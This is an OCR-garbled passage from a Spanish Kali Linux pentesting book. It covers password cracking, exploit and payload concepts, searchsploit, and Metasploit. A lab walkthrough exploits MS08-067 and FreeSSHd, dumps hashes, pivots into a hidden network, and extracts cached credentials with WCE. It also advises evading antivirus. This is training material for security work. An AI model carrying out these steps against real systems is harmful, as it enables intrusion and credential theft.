de Internet, por ejemplo desde http://project-rainbowcrack.com/table.htm, con el fin de 
proceso de crackeo. La herramienta dispone de una serie de parámetros que se indican 


Descripción 


L [Se le indica el hash а crackear. 
E Se le indica un fichero de hashes obtenido de un volcado hashdump. 


Se le indica un fichero con un listado de los hashes en concreto. No es similar a la 
opción f. 
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«hash? |-f <volcado de hashes en fichero>|-1 «listado de hashes>]. 


De igual manera Kali Linux tiene otra herramienta muy potente llamada ophcrack, esta taml ié 
utiliza Rainbow Tables y está disponible tanto en interfaz visual como en terminal y su manejo 
muy similar. 


El problema de estos ataques es el tiempo que conlleva descifrar una contraseña, debido a la enon 
cantidad de posibles combinaciones para ésta, lá cantidad de algoritmos de resumen que existen 
cantidad de posibles resultados que estos algoritmos pueden generar. A medida que avanzan los ай 
estos algoritmos han evolucionado y se hacen cada vez más complejos y fuertes. 


Aquí se puede observar la gran diferencia entre conseguir descifrar un hash LM, (que por ; 
simplicidad puede tardar solo unas horas), debido a que se consiguen generar más de 10 mi 
de hashes por segundo en una maquina sin muchas prestaciones. En cambio en hashes más rob 
como WPA/WPA2 se podrían conseguir únicamente unos 1000 o 2000 hashes por seg 
aproximadamente. 


La diferencia es abrumadora, sin embargo, hay una herramienta muy popular en este mundo Т 
la mayoría de los usuarios tiene en sus ordenadores y desconocen de su valor а la hora de 
contraseñas, como es la GPU de las tarjetas gráficas. Hoy en día las GPU son muy potentes, 
llegar a tener una frecuencia de reloj de entre unos 600 MHz y 1 GHz, menor a la de una CI 
convencional que ronda entre los 2.0 Ghz y 4 GHz. Sin embargo, la GPU está basada en el mod 
circulante, que facilita el procesamiento en paralelo y posee una gran segmentación para las tart 
a diferencia del modelo de Von Neumann que utilizan los CPU. Por tanto, agiliza mucho el proc 
de realizar “ataques de fuerza bruta” en las GPU. 


Kali Linux posee dos aplicaciones muy potentes que emplean el uso de la GPU para “ataques 
fuerza bruta” a contraseñas como lo son oclhashcat-plus y Pyrit, ambas ejecutables a través de 
terminal. 
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Capítulo IV 
Explotación 


itroducción a los exploits 


de los exploits es complejo y amplio. Un exploit no es más que una pequeña aplicación 

el objetivo de aprovecharse de una vulnerabilidad conocida en un software. La 
idad o bug es el resultado de un fallo de programación durante su creación o implantación. 
de programación es algo lógico, ya que las aplicaciones son creadas por seres humanos, 
fallan en su día a día. Por lo general este hecho ocurre en la etapa de implementación, 
lo puede haberse introducido en cualquiera de las etapas del ciclo de vida de un software. 


exploit viene del verbo to exploit, el cual significa aprovechar o explotar. Como se ha 
do anteriormente un exploit es un código escrito con el objetivo de aprovecharse de un 
implementación de un aplicativo y la intención de obtener ciertos privilegios tras la 
Por ejemplo, se podría causar la caída de la aplicación, la modificación de datos que 
el control de la máquina dónde se está ejecutando el aplicativo u obtener información 

de dicho entorno. 


fs tienen su origen en un conjunto de errores de programación similares, por ello, quien 
el funcionamiento de la ingeniería inversa puede detectar estos errores “fácilmente”. 
o de un pentester a la hora de utilizar un exploit es conseguir el máximo de dicha acción, 
el control de la máquina remota. Esta acción se logra cuando se consigue ejecutar código 
lo en la máquina remota a través del exploit. Este código que se ejecuta se denomina payload 


je estrella para desarrollar exploits es el lenguaje C, aunque se pueden realizar en otros 
by, Java, Python, etcétera. 


ibilidades existen por una mala configuración o la utilización de una versión antigua 

' Por esta razón, se recomienda la actualización del software y disponer de las últimas 

que corrijan dichos fallos de programación. La utilización de software pirata no ayuda a 

riesgos, ya que al no disponer de soporte no se podrá actualizar la versión y el usuario 
ble. 
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Conceptos 
¿Qué es un payload? Es la parte del código de un exploit que tiene el objetivo de ejecutarse еп | 
máquina víctima para realizar una acción, generalmente, maliciosa. Un payload no es más que 

serie de instrucciones que el exploit se encarga de inyectar y hacer que se ejecuten por la máq u 
vulnerada. Estas instrucciones de código pueden implementar una shell, un meterpreter, la adició 
de un usuario al sistema, la descarga de un archivo y ejecución de éste, etcétera. Los payloa 
implementan diversas acciones aunque algunos son mucho más conocidos que otros. 


El caso más genérico para todos los sistemas operativos vulnerados es la consecución de una sh 
de tipo inverso. En este caso el atacante habrá conseguido ejecutar una shell en la máquina remota: 
tomar el control de ésta. Además, al ser de tipo inverso, es el payload que se ejecuta en la máqui 
vulnerada quien se conecta al atacante, evitando de esta forma un router. 


Las instrucciones del payload o shellcode son escritas en lenguaje ensamblador. Se pueden visualiz 
ejemplos con msfpayload, herramienta disponible en Kali, para generar variables en disti 
lenguajes de programación con las shellcodes ya generadas. 


adduser USER=164 PASS=pabloglez C 


Irootéroot:-4 msfpayload windows/: 
/* 

* windows/adduser - 272 bytes 
* http://www.metasploit.com 

* EXITFUNC=process, USER-i64, PASS=pabloglez 


*\x61\x6C\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\ x6 x6e\x69\x73" 
"\х7а\х72\хб1\х74\х6\үх72\х73\х20\хб9\хзб\хз4\х20\х2\х41\х44" 


Imagen 04.01: Generación de una shellcode en lenguaje C. 


Las shellcodes suelen ser de tamaño pequeño para poder ser inyectados en espacios pequeño 
memoria, como puede ser dentro de un marco de pila. Generalmente, en el proceso de compil 
la shellcode se generan bytes nulos, los cuales pueden provocar la parada de la ejecución del có 
Se debe tener en cuenta ese hecho cuando se genere este tipo de código. 
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Windows Meterpreter 
Mindows Meterpreter 


ve Injection), Find Tag Mist Stager 
/meterpreter/reverse htt 


Imagen 04.02: Ejemplo de un listado de payloads. 


Windows Meterpreter 


de payloads 

n distintos tipos de payloads, los cuales se enumeran a continuación: 
- Inline o Singles. 

- Stagers. 

== Staged. 


¡ferentes tipos aportan gran versatilidad y son de gran utilidad en los infinitos escenarios а 
e se enfrenta el pentester. 


load de tipo single son código autónomo que solamente realiza una tarea concreta. Por 
cuando el exploit inyecta el payload en memoria y éste se ejecuta otorgando una shell 
al atacante, añadiendo un usuario al sistema o mostrando algún tipo de mensaje de alerta al 


load de tipo stagers son los encargados de crear la conexión entre el atacante y la víctima, 
o previo a la descarga de todo el payload. ¿Por qué es necesario? Existen payloads con 
funcionalidades, como puede ser Meterpreter. Este tipo de payloads necesitan crear una 
n con la máquina vulnerada y después descargar el resto del código en otra zona, por lo que 
ploads de tipo stagers son los utilizados para descargar payloads de tipo staged. 


pload de tipo staged se descargan y son ejecutados por los de tipo stagers y normalmente 
Os para realizar tareas complejas o con gran variedad de funcionalidades. En otras palabras 
po staged utilizan pequeños stagers para ajustarse en pequeños espacios de memoria dónde 
la explotación. La cantidad de memoria que se dispone para realizar la explotación, en la 
de los casos, está limitada. 


de las cosas que hay que tener en cuenta cuando se lista los distintos payloads es la propiedad 

y NX. El NX bit es una característica de los procesadores modernos para prevenir ejecución 

O en ciertas áreas de memoria. Por ejemplo, en sistemas Windows NX es implementado 

^ (Data Execution Prevention). Si se ve esta característica en algún payload del listado 

ue ese código está preparado para evadir el DEP. Los payloads que indican IPv6 en la lista 
están preparados para funcionar en redes ІРуб. 
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2. Explotación en Kali 


| 
| 


Kali proporciona una serie de herramientas interesantes para realizar pruebas de pentesting en el 
ámbito profesional. La más conocida, y una de las que entra en el top 10 de herramientas de auditoria 
de Kali, es Metasploit Framework. En este apartado se hablará de distintas herramientas que pueden 
resultar de utilidad para llevar a cabo explotaciones en un test de intrusión, y se ejemplificarán 
mediante pruebas de concepto y escenarios, para que el lector disponga de ejemplos que pueda 
fácilmente reproducir. 


M tte 
жск 
О негата de stan 


il onone О, necopie 
РСР zv 


эю wee 
илише 


Y Manes нене 


Imagen 04.03: Secciones de aplicaciones para la explotación en Kali Linux 


Base de datos de exploits 


En la sección “Base de datos de exploits” se puede encontrar una herramienta denominada 
searchsploit. Esta aplicación es un script cuyo objetivo es realizar büsquedas por plataformas, 
aplicaciones, protocolos y localizar los exploits que se disponen en la distribución 


La aplicación no e: 


más que un script de bash tal y como se puede visualizar en la imagen, que: 
dispone de un fichero CSV a modo de base de datos. Además, existe una carpeta denominada 
platform que alberga los exploits que se pueden encontrar en un sitio web como exploit-db. 


[reetgkalT Ware7espioItdbé cat searchaploit 
bin/bash 
exploitdb CLI search тоо! 
jesvpath=/usr/shara/exploltdb/files 
usaga: "basenase $9" [term © $0" ora 
€ search terms; second and nane $0" wi 


hti $8 дв) 


Imagen 04.04: Código de Searchsploit. 
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¡ente esta aplicación puede ser sencilla y no muy productiva, pero realmente es todo lo 
trio. La distribución de Kali dispone de un gran número de exploits en su interior, que quizá no 
conocidos debido a que el auditor no los ha utilizado antes. Gracias a esta pequeña herramienta 
len realizar búsquedas de exploits en función de un protocolo, plataforma, versión de producto 
requiera. 


ictura de Searchsploit 
donde se encuentra el script es /usr/share/exploitdb. En el interior de dicha ruta se puede 


- El fichero files.csv. Este fichero contiene un número único que identifica al exploit, la ruta 
- donde se encuentra físicamente, la descripción, la fecha, la plataforma, el tipo de explotación 
(local, remota) y el puerto. Este archivo realiza las funciones de base de datos donde en 
- función de los parámetros de entrada de searchsploit se buscarán coincidencias en files.csv. 
El directorio platform. Este directorio contiene un gran nümero de exp/oits en distintos 
мајеѕ de programación, como puede ser lenguaje C, Ruby, Python, pruebas de concepto 
еп archivos de texto, scripts, etcétera. 

= El fichero searchsploit. Este fichero es ejecutable y contiene el cuerpo del script que se 
lanza y realiza las búsquedas en función de los parámetros de entrada. 


directorio platform se pueden encontrar del orden de más de 22.000 exploits, los cuales se 
тап en el sitio web exploit-db.com. El pentester antes de buscar por la red debería buscar 
nte esta aplicación ya que muy probablemente disponga de un exploit para lo que necesita. 
tener en cuenta que tener esta aplicación actualizada puede no ser tarea sencilla, pero es una 
lenta bastante útil para llevar a cabo búsquedas de exploits en un momento dado. 


de exploits con Searchsploit 

ido se va a explicar una búsqueda con Searchsploit. El resultado de las búsquedas son 
donde se encuentran exploits que satisfacen los patrones de búsqueda que se pasaron a la 
Todo exploit se encuentra en el interior de la carpeta platform, que a la vez dispone de otras 
, Por esta razón es interesante obtener la ruta completa donde se aloja definitivamente el 
T a través de dicha herramienta. 


drá observar que la nomenclatura que utiliza exploit-db para almacenar los exploits es 
e numérica. Por ello, el fichero files.csv indica el nombre del fichero y la descripción real, 
por el nombre del fichero no se consigue gran información. 


ente ejemplo se utiliza la siguiente instrucción searcAsploit freesshd windows. Como se 
lizar la sintaxis de la aplicación es sencilla searchsploit patrón 1 [patrón 2] ... [patrón М]. 
enida por esta primera büsqueda son todos los exploits que se encuentran enumerados en 

csv que coinciden con los patrones indicados. A mayor número de patrones indicados 
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más selectiva es la búsqueda de exploits, por lo que se recomienda utilizar siempre patrones 
plataforma, protocolo o producto si es conocido por el pentester. 


scription 


9 Kay Exchange Algorithm Buffer Overflow Exploit /windows/ ranote/1787 .py 
Remote Stack Overflow PoC (auth) /windows/dos/5789. pl 
(Post Auth] Remote SEH Overflow Exploit Jwindows/ renote/5751 .р\. 


sftp rename Remote Buffer Overflow Рос (auth) /windows/dos/6800 .pl 
sftp realpath Remote Buffer Overflow PoC (auth) /windows/dos/6812.pl 


(rename) Remote Buffer Overflow Exploit (SEH) /windows/ renote/8295 pl 
Remote Buffer Overflow DoS /мїлдомз/ дов /11842.ру 

9 Key Exchange Algorithm String Buffer Overflow /windows/remote/16461, rb 
PoC /windows/dos/18268.txt 


/windows/ remote/23080. txt 
/н\лдомз/ гепоїе/24133. го 


Imagen 04.05: Búsqueda de exploits realizada con searchsploit. 


Otra búsqueda interesante es por el tipo del exploit, es decir, si es un exploit local o de ејесисі 
remota. En un momento dado el pentester puede necesitar un exploit local para elevar privilegios e 
un sistema Microsoft Windows. Por esta razón una büsqueda interesante sería acotar la büsque 
exploits locales, simplemente introduciendo el patrón local en la ejecución de la aplicación. 


Гоотака 1: 7usr/share/exploltdbé searchsploit windows local 
Dosc ription 


/windows/ocal /32.c 
/mindows/Local/52.asm 
/mindows/Local/79.c 

/indows/local/122.c 
/mindows/Local/172.c 
/windows/local /271.с 
windows /\ осв\ /272.с 


S Windows Utility Manager Local SYSTEM Exploit (MS64-011) 
inzIP MIME Parsing Overflow Proof of Concept Exploit 


Imagen 04,06: Búsqueda de exploits locales con searchsploit. 


Metasploit 

Es el nombre que recibe el proyecto, open source, sobre seguridad informática. Este proyecto faci 
el trabajo al auditor proporcionando información sobre vulnerabilidades de seguridad, ayu 
explotarlas en los procesos de pentesting o test de intrusión. El subproyecto más famoso que dispc 
es Metasploit framework, o simplemente denominado Metasploit. Este framework es un conjunto 
herramientas con las que el auditor puede desarrollar y ejecutar exploits y lanzarlos contra máq i 
para comprobar la seguridad de éstas. Otras de las funcionalidades que aporta es un archivo 
shellcodes, herramientas para recolectar información y escanear en busca de vulnerabilidades, 4 


En Kali Linux Metasploit es una de las aplicaciones Top, como se puede entender rápidamente 
consultar el apartado de “Top 10 Security Tools”. En la ruta /us»/share/metasploit-framewo! 
encuentra distribuido el framework. En esta ruta se pueden visualizar los binarios del tipo msf. 
son las herramientas que aportan distinta funcionalidad al framework como: 


- Linea de comandos para interactuar con Metasploit. 


- Interfaz gráfica para interactuar con Metasploit. 
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- » Generación de payloads. 
= Ofuscación de los payloads mediante encoders. 
М. Análisis de binarios. 


ectorio modules proporciona todos los exploits, payloads, encoders, módulos de tipo auxiliary, 
y post del framework, por lo que si se requiere actualizar el número de exploits o de los otros 
jdulos se debe añadir en dichas carpetas. 


a, por ejemplo, de la carpeta exploits se corresponde con la manera de interactuar luego 
os módulos en la línea de comandos. El primer nivel dentro de la carpeta exploits se corresponde 
1 plataforma o tipo de plataformas para el que se desarrolló el exploit. El segundo nivel indica 
otocolo o producto рага el que se implementó el exploit, y por último se encuentra el archivo en 
p, el cual es el módulo del exploit. 


o lado los módulos son una pieza o bloque de código que implementa una o varias 
lalidades, como puede ser la ejecución de un exploit concreto o la realización de un escaneo 
quinas remotas. Los módulos que componen el framework son el núcleo de Metasploit y 
e hacen que sea tan poderoso. Éstos pueden ser desarrollados por los usuarios y de esta manera 
lar el framework de manera personalizada, y en función de las necesidades del auditor, 


ta de los binarios msf se encuentra en la variable $PATH por lo que simplemente lanzándolos 

la línea de comandos se pueden ejecutar, independientemente de la ubicación donde se 
el usuario. A continuación se muestra una tabla a modo de resumen de los binarios más 
tes del framework 


Descripción 


Línea de comandos de Metasploit que permite ejecutar módulos y realizar 
diversas acciones en un test de intrusión. 


Interfaz que permite lanzar un módulo concreto mediante su configuración en 
misma ejecución de la aplicación. 

Interfaz gráfica para realizar las mismas acciones que con msfconsole. 
Servicio que queda a la escucha pendiente de recibir conexiones para ofrecer 
una línea de comandos en remoto. 

Permite realizar búsquedas en ejecutables, tanto como búsquedas de 
instrucciones de salto, instrucciones POP, etcétera. 

Permite realizar un análisis sobre DLLs y obtener la dirección de retorno 
deseada para que la shellcode se ejecute como se espera. 


Permite generar shellcodes en distintos lenguajes de programación, e incluso 
embeberlas en ejecutables de windows o binarios de UNIX. 

Permite ofuscar el código de la shellcode provocando que los AVs o IDS o los 
detecten. 
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Binario | Descripción 
msfvenom | Esta utilidad es el resultado de la unión entre msfencode y msfpayload. 
| msfupdate | Permite actualizar el framework, incluyendo módulos y funcionalidades. 
Tabla 04.01: resumen de los binarios más importantes de Metasploit. 


Proof Of Concept: Pivote + 0Day = Owned! 

A finales del año 2012 se descubrió una vulnerabilidad en la aplicación FreeSSHd, la cual a medi; 
del año 2013 sigue siendo una vulnerabilidad de tipo Oday. Existe un gran número de aplicaciones qu 
no son de ámbito general, es decir, no son conocidas por la mayoría de los usuarios de la informáti 
pero que son utilizadas por empresas en el mundo laboral. Al no tratarse de aplicaciones como Ja 
о Adobe Reader hacen que sus desarrolladores vivan en un mundo más tranquilo, simplemente p 
el hecho de no tener la presión de parchear tras el descubrimiento de una vulnerabilidad crítica. 4 


FreeSSHd es un sencillo servidor SSH para equipos Microsoft Windows. Este servidor permi 
gestionar sesiones de shell y gestión de archivos de forma segura mediante SFTP. La vulnerabili 
afecta a las versiones iguales o inferiores a la 1.2.6. 


El escenario presentado es el reflejo de una posible situación real en un entorno laboral de 
empresa. El escenario de la prueba de concepto es el siguiente: i 
- Máquina con Windows XP SP3 vulnerable a la famosa vulnerabilidad MS08 067 nek 


Esta máquina dispone de dos tarjetas de red, la primera configurada en la red 192.168.1. 
y la segunda configurada en la red 10.0.0.0/8. 


daptador Ethernet Conexión de área local 


de 4б ífica DNS 
Sufijo de conexión específica 


Rdaptador Ethernet Conexión de área local 2 


ufijo de рання específica DNS 
Dirección 
Ша LS 
Puerta de enlace pre: 


Imagen 04.07: Configuración de red de Windows XP. 


- Máquina con la distribución de Kali Linux y Metasploit. Esta máquina se encuentra 
una red de desarrollo, en la red 192.168.1.0/24, sin conectividad con la red 10.0.0.0/8. 


t 181f/84 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:l 


RX packets:1065 errors:0 dropped: overruns:8 f 

TX packets:27 errors:8 dropped:8 overruns:0 carrie 
collisions:8 txqueuelen:1088 

RX bytes:114365 (111.6 KiB) TX bytes:2388 (2.3 KiB) 


Imagen 04.08: Configuración de red de Kali Linux. 


-10.0.0.0/8. Se entiende que la máquina Windows 7 es una máquina importante, podría ser ип 
servidor crítico sin conectividad con la máquina Kali Linux. 


Imagen 04.09: Configuración de red de Windows 7. 


ali Linux el pentester realizará un escaneo de servicios y versiones sobre las máquinas 
que se dispone de conectividad, El objetivo es verificar si existe alguna vulnerabilidad, ya 
ia operativo o alguna aplicación que se ejecuta en esa máquina. ¿Se dispone de alguna 
ial o hash de Windows para intentar impersonalizar la sesión de usuario? Si aún el pentester 
de esta información habrá que encontrar una vía mediante la explotación de alguna 
dad o la interceptación de información sensible en la red. 


alizar la máquina XP, con la que se dispone de conectividad directa, se observa que puede 

ble a una vulnerabilidad de 2008 que afecta al servicio SMB. Sin necesidad de que el 

la máquina XP realice ninguna acción se puede obtener el control remoto de la máquina. 

za un escáner de puertos que viene incluido como módulo de tipo auxiliary en Metasploit. En 

se puede visualizar la configuración que se realiza del módulo y como se detectan ciertos 
módulo utilizado es auxiliary/scanner/portscan/tcp. 


> ое auxi iary/acanner/portacan/tcp 
auxlliarytep) > show options 


odule options [auxiliary/scenner/portscan/tcp) 


Current Setting Required Description 


Ports to scan (e.g. 22-25,80, 110-900) 
RHOSTS. yes The target address range or CIDR identifier 
TEADS 1 Yes The потег of concurrent threads 

Timeout — 1006 yos The socket connect timeout in milliseconds 


1 hosts (100% complete) 
"| Auxiliary module execution completed 


Imagen 04.10: Configuración y ejecución de portscan contra la máquina XP. 


e visualizar el famoso puerto 445, “yes, i am smb!”. Si se disponen de credenciales о hashes 


. En esta prueba de concepto se utilizará el famoso MS08 067 netapi. 


el módulo auxiliary/scanner/smb/smb version para verificar rápidamente que tipo de 
ез el que se acaba de escanear. 
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Se obtiene información interesante como puede ser: 
- Versión del sistema operativo y Service Pack. 


-Idioma de la versión del sistema operativo. Este dato es importante en versiones anteri 
a Windows Vista y 2008. 


- Nombre de la máquina y dominio. 


wuxlliary(tcp] > use auxiliary/scamner/smb/ssb version 
muxiliary(smb version) > show options ү 
dule options [auxiliary/scanner/ssb/smb version): 


The target address range or CIOR identifier 
The Windows domain to use for authentication 
The password for the specified username 

The usernase to authenticate as 

The number of concurrent threads 


Imagen 04.11: Obtención de información sobre el equipo mediante smb_version, 
A continuación se lanza el exploit para la vulnerabilidad MS08 067 netapi. En la imagen se рі 


visualizar la inyección del Meterpreter tras aprovechar la vulnerabilidad y se consigue el с 
total de la máquina remota. 


парлау tcp 


m wirama na 
ит (esi б Аш!) » тет OST 1802.168.137 
ка) 
келү petani) > валад 


Imagen 04.12: Explotación de Windows ХР. 


En este instante se debe explorar el equipo vulnerado en busca del máximo de información, 
puede ser: 
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A Configuración de red. Se pueden descubrir nuevas redes o analizando el tráfico que 
circula por los posibles adaptadores de red encontrar máquinas con las que no se dispone de 
- conectividad y que pueden ser críticas. 

- Volcado de usuarios almacenados en la SAM. Si la máquina fuera un Domain Controller 
_ se podría obtener, siempre y cuando se tuvieran privilegios, un volcado de usuarios del 
dominio, con lo que la auditoría interna de red acabaría ya que se obtendría acceso completo. 
Соп estos usuarios se podría realizar impersonalización de estos en otras máquinas Windows 
de la red. 

- Información global de la máquina, mediante la ejecución de scripts como scraper о 
winenum. 

- Utilizar la máquina vulnerada como pivote para disponer de conectividad con otras 
máquinas. 

=- Búsqueda de credenciales cacheadas en la máquina mediante la utilización de herramientas 
- сото Mimikatz о WCE en la máquina remota. 


las primeras acciones a realizar, como se menciona anteriormente, es investigar la 
ión de la red en la máquina vulnerada, ya que se pueden encontrar nuevas máquinas 


imagen se puede visualizar como la máquina XP dispone de dos adaptadores de red, uno en la 
168.1.0/24 y otro en la red 10,0.0.0/8, además del adaptador local o de loopback. 


ptador Ethernet PCI AMD PCNET Family - Minipuerto del administrador de ра 
:27:07:12:08 


49 
: 255.255.255.0 


: Adaptador Ethernet PCI АМО PCNET Family #2 - Minipuerto del administrador de paquetes 
d& 


Imagen 04.13: Configuración de red de la máquina XP. 


instante se debe configurar una ruta interna en Metasploit para poder tener conectividad con 
inas de la red 10.0.0.0/8 a través de la sesión con id 1, que es la que se acaba de crear con 
бп. 


utilizar el script autoroute en la sesión de Meterpreter, o también es posible utilizar el 
ndo route de Metasploit tal y como se puede visualizar en la imagen 04.14 de la siguiente 


Pentesting con ] 


eterpreter > background 
[*] Backgrounding session 1... 
т exploit(ms08_067_netapi) > route add 10.0.0.0 255.0.0.0 1 


exploit(ms08_067_netapi) > route print 


ictiva Rout, ing Table 


Gateway 


Session 1 


Imagen 04.14: Configuración de pivoting . 


Antes de explorar la гей 10.0.0.0/8 se debe obtener, o intentar conseguir, información impo» 

la que se pueda volver a entrar al equipo sin necesidad de explotar ninguna vulnerabilidad. Se po 
hacer persistente a Meterpreter, pero esto es invasivo y los AVs podrían detectarlo rápidamel 
Por esta razón se decide realizar un hashdump o volcado de hashes del equipo vulnerado, 
esta información se podría volver al equipo a través del módulo exploit/windows/smb/p 
impersonalizar al usuario. 


067 netapi) > sessions -i 1 
i" Starting interaction with 1... 


1803:8735172c3a77d2c6aad3b435b51404ee : 1512599989997: 3b55BBcaf ac 9c8ae969: : : 
RT. E :1002:ad3b435b514040022d3b435b51 40460 : 3cbGda951c4388978ebcc94400725954 


Imagen 04.15: Volcado de hashes. 


Una vez realizado el volcado de hashes de usuario de la máquina XP se utiliza a ésta como р 
para llegar a la red 10.0.0.0/8 y realizar un escaneo sobre dicha red. De este modo, se р 
descubrir que máquinas se encuentran en dicha red, de algún modo “ocultas” o sin conectividad a 
máquina del pentester, 


Se utiliza el módulo auxiliary/scanner/portscan/tep para “barrer” la red 10.0.0.0/8, configurando Y 
rango de puertos bajo. De esta manera se consigue descubrir máquinas rápidamente, aunque oti 
forma es configurar puertos típicos en redes empresariales, como puede ser el SMB. Una vez qu 
se han descubierto las nuevas máquinas se debería realizar un análisis exhaustivo de los servicio 
versiones de éstas. 


Como se puede visualizar en la siguiente imagen se ha obtenido una nueva máquina, a prio 
desconocida por el pentester. La nueva máquina tiene como dirección IP 10.0.0.2 y aparte de dispon 


IV. Explotación ЕУ 


ertos típicos 135,139 у 445, tiene el puerto 22 a la escucha. ¿Es un equipo UNIX? El puerto 
ecto correspondería con un servidor SSH, muy común en dichos sistemas operativos y 
to en sistemas Windows. Por otro lado, los puertos anteriores son más comunes de sistemas 


[7] Backgrounding session 1... 
exploit(ms0B8 067 netapi) > use auxiliary/scanner/portscan/tcp 
auxiliary(tcp) > set RHOSTS 10.0.9.0/24 

RHOSTS => 10.8.8.8/24 

auxiliary(tcp) > set PORTS 20-508 


auxiliary(tcp) > run 


10.0.0.1:135 - ТСР OPEN 


10.8.0.1:139 - ТСР OPEN 
10.0.0.1:445 - TCP OPEN 
10.0.0.2:22 - TCP OPEN 
8.8.2:139 - TCP OPEN 
.0.0,2:135 - TCP OPEN 
8.8.2:445 - ТСР OPEN 


Imagen 04.16: Descubrimiento de la máquina Windows 7. 


nte paso es verificar qué sistema operativo y para ello se utiliza de nuevo el módulo auxiliary/ 
mb/smb. version. La configuración es sencilla, solo hace faltar indicar el equipo remoto y 
el módulo, El resultado obtenido es que el sistema operativo es una máquina Windows 7, 
iendo además el nombre de la máquina y el dominio al que pertenece. 


Imagen 04.17: Descubrimiento de sistema operativo. 


| ya se sabe que es una máquina Windows 7 соп el puerto 22 a la escucha. Hay que verificar que 
uerto 22 se trata de un servicio del protocolo SSH e intentar obtener el máximo de información 

ello. Las aplicaciones que implementan el protocolo SSH en sistemas Windows suelen ser 
imientas de nivel medio, es decir, con poco Soporte о actualizadas en períodos de tiempo 
o. Este hecho puede provocar que existan vulnerabilidades y exploits sobre ellas que ayuden al 


r à entrar en sistemas que de otra forma no podría, 


investigar más sobre el protocolo SSH de la máquina Windows 7 se utiliza el módulo auxiliary/ 
ssh/ssh. version. Tras configurar el módulo se obtiene información, que en un principio, 
resultar extraña. Se obtiene que el protocolo es "ss/i-2.0-weonlydo 2.1.3", el cual puede 
ir al pentester por su desconocimiento. El pentester puede encontrarse en un punto de 
nocimiento o de inflexión, por ello se apoyará en Internet para descubrir más sobre dicho 
tocolo. ` ' 


Pentesting con 


&uxiliary(smb version) > use auxiliary/scanner/ssh/ssh version 
auxiliary(ssh version) > set RHOSTS 10,0,0,2 


[=] 10.8.8.2:22, SSH server version: SSH-2.8-WeOnlyDo 2.1.3 
[^1 Scanned 1 of 1 hosts (109% complete) 
*] Auxiliary module execution completed 

auxiliary(ssh version) » 


Imagen 04.18: Descubrimignto de versión del protocolo SSH. 


Se busca información en Google sobre "ssh-2.0-weonlydo 2.1.3” y se utiliza además 
posibilidades como "ssh-2.0-weonlydo 2.1.3 exploit”. Google puede arrojar sorpresas en. 
büsquedas, no hay más que entender el funcionamiento de Google Hacking. En este caso, se ol 
información sobre un Oday y el código del exploit para llevar a cabo la explotación ти 
Metasploit. 


| ssh-2.0 weonlydo 2.1.3 exploit 


Web imágenes Maps Shopping Más» Herramientas de búsqueda ‹ 


Aproximadament 699 resultados (0,32 segundos) 


EreeSSHD Remote Authentication Bypass Zeroday Exploit 
www.exploit-db.com/exploits/23... - Estados Unidos - Traducir esta página 
02/12/2012 — FreeS SD Ramote Authentication Bypass Zeroday Exploit... banner of 
tho most recent version is: 88H-2.0 WeOnlyDo 2.1.3 For your pleasum, ... 


authentication. ...  versionzbanner : 
туї... . if version == /(2.1.3/2.0.8) retum Exploit :CheckCode::Appears end ... 
Imagen 04.19: Encontrar exploit y aplicación para el protocolo SSH. 


Una vez que se ha encontrado un exploit y que se ha visto que el protocolo anterior es utilizado 
una herramienta denominada FreeSSHd, se busca medianté el comando search en Metasploit 
comprobar que se dispone de dicho exploit ya agregado en el framework. Además, se comp 
que hasta la versión 1.2.6 de FreeSSHd este exploit es exitoso, y la sorpresa del pentester es ma; 
cuando en el sitio web original de la aplicación se comprueba que la última versión disponible 
precisamente la 1.2.6. Por lo tanto ¡es un Oday! 


Tras entender que la máquina Windows 7 es vulnerable gracias a una aplicación de terceros install 
en ella, el pentester configura el módulo que provocará tomar el control de la máquina remo! 
a través del pivote que proporciona la máquina XP. La configuración del módulo es sencilla, 
dispone de un parámetro denominado USERNAME que indica una lista de nombres de usuario 
los que estos generalmente se pueden loguear en la aplicación. El pentester deberá introducir los 
comunes ya que de esa suerte dependerá el éxito del ataque. Además, existe otro parámetro en el 
se puede proporcionar un listado de usuarios en un fichero. 


` 


lo IV. Explotación 


z 

Жоо [reesand suthoypass) > snow optiona, 

A options (exploit/windo/asn/freessha_sutroypass 
Current Serting 


most Y 
ww _ 2 


Fale containing Оне танаа. 


гавна authbypass) > sel USERNAME aaninist racor 
sar PAYLOAD virdows/seterpreter/bind tcp 


i'authbypass] > 
"=> windowa/meterpratar ва tep 
ехото (тега ao 


Imagen 04.20: Configuración del módulo del exploir рага el Oday. 


vez configurado el módulo se procede a la explotación de la máquina remota mediante el uso 
somando exploit. El payload configurado fue un Meterpreter de tipo bind que proporciona una 
de éste. Una vez que se consigue la sesión bind de Meterpreter se puede obtener de nuevo 
rmación en la máquina remota. Es importante siempre ir recopilando nuevos usuarios y el 
or nümero de información respecto a las máquinas disponibles desde ésta. 


reesshd authoypass) > exploit 
A started ыла мег 


7] Sending tape (753128 pyres) 
=) Materpreter session 2 opened (192.158.1.37-192,168.1.48:8 -> 18.8.0.2:4444) at 2013-03-25 01:00:51 «0100 


ms онша 
TEXTS U$practicasPC dni nist rador -017872616374696361 73072450435 41646069608973747261646172 


Imagen 04.21: Explotación de la aplicación FreeSSHd en Windows 7. 


nente se comentaba que se podría obtener información sensible de los equipos donde se esté 
ando. Esto realmente es así, ya que todos los inicios de sesión quedan cacheados en el sistema, 
dos en baseó4, con lo que todo ello conlleva. Por lo que, con las herramientas adecuadas, 
obtener información sensible, como contraseñas de usuario de Windows en texto plano. 


/ 
а realizar esta acción se utilizará la herramienta Windows Credencial Editor. En primer lugar se 
subir el EXE a la máquina Windows 7 donde después se ejecutará. Puede que los AVs detecten 
herramienta, por lo que una buena solución es deshabilitar el AV o encodear el ejecutable para 
O ingetectable. Otra herramienta que podría llevar a cabo esta acción es Mimikatz. 


: /root/wce.exe -> c: 
i /root/wce.uxa -> c:\\weo.i 


Imagen 04.22: 2: Subida de WCE а la máquina Windows 7. 


La ejecución y obtención de credenciales cacheadas en plano se realiza a través de la shell г 
que proporciona Metepreter. Los administradores de sistemas suelen llevar malas prácticas, co 
un uso indebido del administrador del dominio, el cual puede quedar cacheado y ser descubie 
un pentester en cualquier equipo cliente o servidor. Por esta razón, y ya que no existe una sol 
fácil, los administradores deben evadir la utilización de dichas credenciales siempre y ci 
posible. Ж 


СЕ vl.3beta (Windows Credentiels Editor) - (c) 2010,2011,2012 Amplis Security 
by Hernan Ochoa [hernenganpl Lasecurj t y com) 
^ for help 


tredor:practicasif-9C:8735172C347702C6A40 8435851 4B4EE -5 12099009987 


